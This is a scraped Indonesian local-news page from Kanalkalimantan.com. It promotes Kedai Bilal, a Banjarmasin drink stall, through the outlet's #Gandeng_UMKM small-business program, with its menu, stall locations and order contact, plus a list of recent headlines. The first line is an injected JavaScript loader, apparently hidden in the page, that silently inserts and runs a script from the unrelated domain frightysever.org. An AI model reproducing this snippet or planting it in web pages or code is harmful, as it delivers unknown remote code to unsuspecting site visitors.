(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Gandeng UMKM

Segarnya Caramello Kedai Bilal, Harga Murah Rasanya Mewah


KANALKALIMANTAN.COM, BANJARMASIN – Perlu kesegaran di tengah kesibukan, atau menambah semangat saat kongkow dengan teman? Tak salah jika kamu mencoba mencicipi kesegaran Caramello dari Kedai Bilal.

Caramello, minuman yang kini lagi trend di kalangan milenial ini memang menyajikan rasa yang kaya serta segar. Minuman dengan bahan campuran susu, kopi, caramel, dan jely ini, menjadi kombinasi unik yang akan menjadi sensasi baru kesegaran.

“Kami menyajikan minuman mulai dari Caramello, Vanilla Latte, Cappucino, Cafe Latte dengan standar tinggi. Tak kalah dengan kafe atau tongkrongan high class. Meskipun harga tetap ramah di kantong,” katanya pemilik Kedai Bilal.

Ia mengatakan, sudah merintis usahanya ini sejak tahun 2019 lalu. Hingga saat ini bisa membuka beberapa stand di sejumlah lokasi di Kota Banjarmasin. “Alhamdulillah, produk Kedai Bilal ini diminati para pelanggan. Saat ini kami juga terus mencoba membuat berbagai jenis minuman baru untuk kepuasan pelanggan,” ungkapnya.

Dengan bergabung bersama #Gandeng_UMKM Kanalkalimantan, ia berharap Kedai Bilal semakin dikenal luas. “Saat ini promosi dan jaringan menjadi kunci sukses dalam bisnis. Makanya kami menyambut baik dengan program #Gandeng_UMKM ini agar usaha kami bisa memiliki jangkauan pasar yang lebih luas,” harapnya.

ALAMAT:
Saat ini, produk Kedai Bilal telah hadir di tiga stand di Kota Banjarmasin. Yakni di Jl. Dahlia (halaman warung Coba Rasa), di Jl. Kelayan B (samping Gang Cempaka), dan Jl. A Yani KM 6.3 (Alfamart). Jika kamu menginginkan pesan antar, bisa juga menghubungi melalui WA: 081256831336

PRODUK:
Berbagai produk minuman andalam Kedai Bilal meliputi:
Caramello
Cappucini
Vanilla latte
Cafe latte
Black coffee
Chocolate
Milo
Yakult milk
Tea tarik
Milk tea
Green tea
Thai tea
Lemon tea

Apa itu #GandengUMKM?

Program gandeng UMKM yang  dilaunching Kanalkalimantan.com, yakni menghadirkan liputan eksklusif bagi para pelaku UMKM di Kalimantan Selatan tanpa dipungut biaya alias gratis.
Setiap UMKM yang sudah mengirimkan profil dan katalog produknya, akan dipublikasikan di web Kanalkalimantan.com dan semua akun media sosial kami.

Pada program ini, Kanalkalimantan.com juga mengajak mitra pemilik dan pengelola akun media sosial untuk bersama membantu UMKM. Seperti halnya Shalokal Grup (shalokal,com & @shalokal.com_instabaiman), Kabar Banua Kalsel (@kabar_banua_kalsel), Info Daha Negara (@infodahanegara), Sejarah Banua (@sejarah_banua) dan Tanah Laut Info (@tanahlautinfo).

“Adapun caranya adalah dengan ikut memposting ‘aset promo’ yang telah kami sediakan, dan aset promo ini pun nantinya akan kami sertakan/tampilkan logo dari setiap akun sosmed yang ikut mendukung,” kata Kepala Divisi Program dan Kreatif Kanalkalimantan.com, Andy Arfian.

Andy berharap, melalui program ini para UMKM juga menemukan calon pembeli yang cukup signifikan untuk mendongkrak usaha. Sebab dengan bantuan media online dan medsos lainnya, otomatis pasar online akan terbuka lebih lebar.

“Melalui program ini, UMKM akan lebih dikenal. Apalagi ke depan kami juga akan melakukan pembinaan dengan menggandeng sejumlah pakar untuk bersama memberikan masukan terkait pengembangan bisnis sektor UMKM,” tegasnya.

Untuk bergabung dalam program ini, para pelaku UMKM tinggal mengirim profile dan katalog ke email: kanalkalimantancreative@gmail.com. (Selengkapnya bisa dilihat pada infografis, Red).


(Kanalkalimantan.com/cel)

Editor: Cell


Desy Arfianty

Recent Posts

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

1 menit ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

26 menit ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

3 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

3 jam ago

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

19 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

20 jam ago

This website uses cookies.